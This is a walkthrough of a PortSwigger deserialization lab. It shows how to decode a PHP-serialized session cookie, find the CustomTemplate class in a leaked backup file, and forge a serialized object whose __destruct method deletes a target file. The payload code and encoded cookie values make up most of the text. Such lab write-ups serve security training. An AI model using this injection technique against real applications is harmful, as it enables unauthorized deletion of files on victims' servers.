# Arbitrary object injection php

[Level description](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-arbitrary-object-injection-in-php) - Practitioner


## The hack

Recognize the `session` cookie is a serialized php object.

We can inject a `CustomTemplate` object in the `session` cookie and thus execute code in `__destruct()`.

How do we know all these? Well, the level nicely left a comment in the html
page: 

```html
<!-- TODO: Refactor once /libs/CustomTemplate.php is updated -->
```

And that code is available on `/libs/CustomTemplate.php~` of the level site.


## Walk through

1. Login as `wiener`.

2. Bring up the dev console and switch to the `Application` tab

3. The url decoded `session` cookie is a base64 encoded string, like so

    ```
    Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJxcWc2bXA0czNkZmYxNGx5c2lxd3VzaWt4NG5zNDUzbCI7fQ==
    ```

4. Perform a base64 decode on the encoded string to get

    ```
    O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"qqg6mp4s3dff14lysiqwusikx4ns453l";}
    ```

5. Visit `/libs/CustomTemplate.php~` on the level site. Read the source code
and pay attention to `__destruct()`

6. Write some php code:

    ```php
    <?php

    class CustomTemplate {
        public function __construct() {
            $this->lock_file_path = '/home/carlos/morale.txt';
        }
    }

    echo serialize(new CustomTemplate());
    // O:14:"CustomTemplate":1:{s:14:"lock_file_path";s:23:"/home/carlos/morale.txt";}
    ?>
    ```

7. Run the php script to obtain:

    ```
    O:14:"CustomTemplate":1:{s:14:"lock_file_path";s:23:"/home/carlos/morale.txt";}
    ```

8. Perform a base64 encode on the string. We'll use this as the `session` cookie

    ```
    TzoxNDoiQ3VzdG9tVGVtcGxhdGUiOjE6e3M6MTQ6ImxvY2tfZmlsZV9wYXRoIjtzOjIzOiIvaG9tZS9jYXJsb3MvbW9yYWxlLnR4dCI7fQ==
    ```

9. Url encode the value and use it as the `session` cookie.

10. Perform a http request with that cookie and `/home/carlos/morale.txt` will be removed. Done.
